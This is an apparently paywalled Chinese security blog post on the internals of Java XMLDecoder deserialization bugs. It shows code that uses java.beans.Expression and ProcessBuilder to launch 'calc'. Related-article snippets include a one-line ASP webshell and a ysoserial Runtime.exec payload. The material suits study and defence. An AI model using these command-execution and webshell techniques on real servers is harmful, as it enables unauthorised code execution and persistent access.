【网络安全】反序列化漏洞底层扩展与制作WebShell

最新推荐文章于 2025-06-15 16:07:20 发布
原创 最新推荐文章于 2025-06-15 16:07:20 发布 · 683 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #信息安全 #计算机网络

本文探讨了XMLDecoder反序列化漏洞的底层机制,展示了如何利用Expression类制作WebShell。同时,讲解了ScriptEngineManager如何实现Java与JS的交互,以及其执行远程JS代码的尝试与限制。此外,还介绍了ELProcessor在表达式语言中的应用,同样利用反射执行命令。文章总结了各种表达式执行的共同点——Java反射技术,并提到了JNDI注入的绕过策略。

在这里插入图片描述

XMLDecoder反序列化漏洞底层

参考的文章已经分析的非常详细了,这里我主要是就是一下最后的执行是怎么样的。也就是Expression类的使用

import java.beans.Expression;

public class test {
   
   
    public static void main(String[] args)throws Exception {
   
   
        Parameter();//有参数
        NoParameter();//无参数
    }
    public static void Parameter() throws Exception{
   
   
        Object var3 = new ProcessBuilder();
        String var4 = "command";
        String[] strings = new String[]{
   
   "calc"};
        Object[] var2 = new Object[]{
   
   strings};
        Expression var5 = new Expression(var3, var4, var2);
        Object value = var5.getValue();//获得参数的类

        String var1 = "start";
        Object[] var6 = new Object[]{
   
   };
        Expression expression = new Expression(value, var1, var6);//执行start方法
        expression.getValue();

//        为什么不能执行?因为class.newInstance只能调用无参构造函数而ProcessBuilder没有无参数构造函数。
//        Class<?> aClass = value.getClass();
//        Object o = aClass.newInstance();
//        Method start = aClass.getMethod("start");
//        start.invoke(o);
    }
    public static void NoParameter(){
   
   
        String[] strings = new String[]{
   
   "cmd.exe","/c","calc"};
        Object var3 = new ProcessBuilder(strings);
        String var4 = "start";
        Object[] var2 = new Object[]{
   
   };
        Expression var5 = new Expression(var3, var4, var2);
        try {
   
   
            var5.getValue();
        } catch (Exception e) {
   
   
            e.printStackTrace();
        }
    }
}

在这里插入图片描述
并且通过测试可以发现Expression的使用,给出下面的例子。

public class cmd {
   
   
    public void Noparameter(){
   
   
        System.out.println("无参数调用....");
    }
    public void Parameter(Object[] obj){
   
   
        System.out.println("有参数调用....");
    }
}
import java.beans.Expression;

public class test1 {
   
   
    public static void main(String[] args)throws Exception {
   
   
        Object var3 = new cmd(</
最低0.47元/天 解锁文章
Java反序列化和JNDI注入漏洞案例实战
悦分享
08-04 1351
CORBA全称(Common ObjectRequest Broker Architecture)也就是公共对象请求代理体系结构,是OMG(对象管理组织,一个非盈利性的计算机行业标准协会)制定的一种标准的面向对象应用程序体系规范。其提出是为了解决不同应用程序间的通信,曾是分布式计算的主流技术。CORBA标准主要分为三个部分,IDL(接口语言)、ORB(对象请求代理)、IIOP(ORB之间的操作协议)。其结构主要分为三部分:naming service、client side、servant side。...
网络安全专业名词解释
qq_40909772的博客
03-04 1万+
Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 C2全称为Command and Control,命令控制,常见于APT攻击场景中。作动词解释时理解为恶意软件攻击者进行交互,作名词解.
网络安全反序列化漏洞底层扩展制作WebShell
2201_75856701的博客
02-10 241
通过学习XMLDecoder的底层执行的流程去发现其他表达式执行,而其中的很多底层都是通过java反射技术实现的!
bmcl java_Shiro rememberMe 反序列化漏洞Webshell
weixin_32797441的博客
02-28 408
Shiro rememberMe 反序列化漏洞Webshell修改ysoserial使其支持生成java代码执行Payload原来的代码String cmd = "java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + "\")...
20、渗透测试笔记_webshell制作_20191114
__Qian的博客
11-14 1354
1、webshell种类 一句话木马 小马 大马 打包马 脱裤马 等等 2、一句话木马 2.1、介绍 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用 <%excute request("value")%> 2.2、工作原理 黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码: <%excute request("val...
webshell生成
12-30
本工具,可以直接生成WEBSHELL和提权用的文件。
网络安全相关面试题(hw)
XLbb的博客
05-23 1717
7、敏感信息收集,如 github 源码、用 7kb、破壳扫源代码泄露(.hg、.git、cvs、svn、.DS_store 源代码泄露)、google hack、接口信息泄露、社工信息泄露、邮箱地址信息收集、网盘搜索、钟馗之眼、天眼查、威胁情报、微步在线等。3、可以使用 D 盾_web 查杀工具、火绒剑、 XueTr 等工具进行判 断可疑进程(如蓝色、红色进程、没有签名验证信息的进程、没有 描述信息的进程、进程的属主、进程的路径是否合法、 CPU 或内存资源占用长时间过高的进程)
搭建网站模拟webshell写入
m0_46412408的博客
08-13 788
下一步就是在public目录下通过请求参数去写入shell,攻击者上传Webshell后,往往还会执行进一步的操作,如提权、添加用户、写入系统后门等,实现持久化驻留。对日志进行分析,严格管理权限,排查网站可能存在的漏洞,使用河马查杀webshell,使用wireshark抓包工具捕获网络流量并进行分析。在物理机上搭建网站,实现对网站写入webshell,并用菜刀连接木马,从而对门户网站信息篡改,获取门户网站的敏感信息。·采用白名单机制上传文件,不在白名单内的一律禁止上传,上传目录权限遵循最小权限原则。...
WebShell系列(一)---XML
weixin_34319111的博客
03-08 763
zcgonvh · 2015/04/29 10:20想来想去还是归结成一个系列吧,虽然说在现在各种讲究高大上的时代还谈webshell实在是一种没什么品味的做法。 基本上也就是一些新型webshell、特殊环境下的特殊利用、特殊webshell的菜刀中转脚本等,外带一些对应的分析。 先挖个坑,至于填坑么⋯⋯看情况吧。0x01 xmlxslt相信所有人对xml都不陌生,其被广泛的应用于数据数据传输...
ScriptEngine执行复杂js报数组越界
weixin_30877755的博客
02-13 271
import javax.script.Invocable; import javax.script.ScriptEngine; import javax.script.ScriptEngineManager; import javax.script.ScriptException; /** * @Author: SimonHu * @Date: 2019/2/12 11:...
在Java中直接调用js代码
热门推荐
xzyxuanyuan的专栏
10-12 10万+
JDK1.6版添加了新的ScriptEngine类,允许用户直接执行js代码。 在Java中直接调用js代码 不能调用浏览器中定义的js函数,会抛出异常提示ReferenceError: “alert” is not defined。   package com.sinaapp.manjushri;  import javax.script.ScriptEng
解决:Cannot invoke “javax.script.ScriptEngine.eval(String)“ because “engine“ is null
weixin_61465100的博客
03-11 3897
解决:Cannot invoke "javax.script.ScriptEngine.eval(String)" because "engine" is null
安全漏洞及修复方案
最新发布
zqmattack的博客
06-15 560
【安全漏洞及修复方案摘要】 动态解析代码漏洞:通过ScriptEngine执行未校验的用户输入可能导致代码注入攻击(如执行系统命令)。修复方案:1)避免直接解析用户代码;2)建立合法操作白名单;3)严格过滤特殊字符(括号、运算符等)。 正则表达式注入:拼接用户数据到正则表达式时存在攻击风险。修复方案:对正则元字符(如()[]?*{}|)进行转义处理。 DOM注入风险:JS中未经处理的动态创建DOM可能导致攻击。解决方案:对插入HTML的数据进行转义处理。 (150字)
【web安全系列】scriptEngine注入防御
qq_35789269的博客
09-30 3433
脚本引擎注入防御
Node.js 常见漏洞学习总结
lastwinn的博客
02-06 2368
记录自己的所学以及理解
webshell实践
qq_60680687的博客
08-14 572
原理:我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[’ ‘]、$_POST[’ ‘]、$_COOKIE[’ '] 接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。话说做webshell检测的时候,因为要绕过HIDS,常规的一句话木马,大马都基本上会被拦截,不得不去找了一些php提供的”安全函数“(ps,这里我所指的“安全函数”是php的内置的回调函数,因为本身这些方法都是php自提供的,所以还是一定程度上可以绕过的)。
Java安全学习笔记-反射篇
weixin_43136170的博客
07-21 730
反射可以做到:1. 用对象获取他的类2. 用类拿到所有方法3. 拿到方法可以调用
告别安全隐患!JavaScript中eval()的替代方案最佳实践
专注大前端与服务器端实战技巧,分享日常开发中的高效工具链、组件设计心得与全栈调试手记。每周更新原创教程,用一杯茶的时间解锁可落地的编程知识,让技术沉淀如茶香自然醇厚。
05-11 1509
某天,程序员小李在开发一个动态配置页面时,为了快速实现「用户输入表达式实时计算」功能,写下了这样一行代码...
Java反序列化漏洞演示分析POC
信息安全领域中,Java 反序列化漏洞是较为常见的安全问题,该漏洞允许攻击者通过发送恶意序列化的数据到目标应用中,从而执行攻击者选择的代码。SerializablePoc.zip 文件中包含的示例代码(即 POC,Proof of ...
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值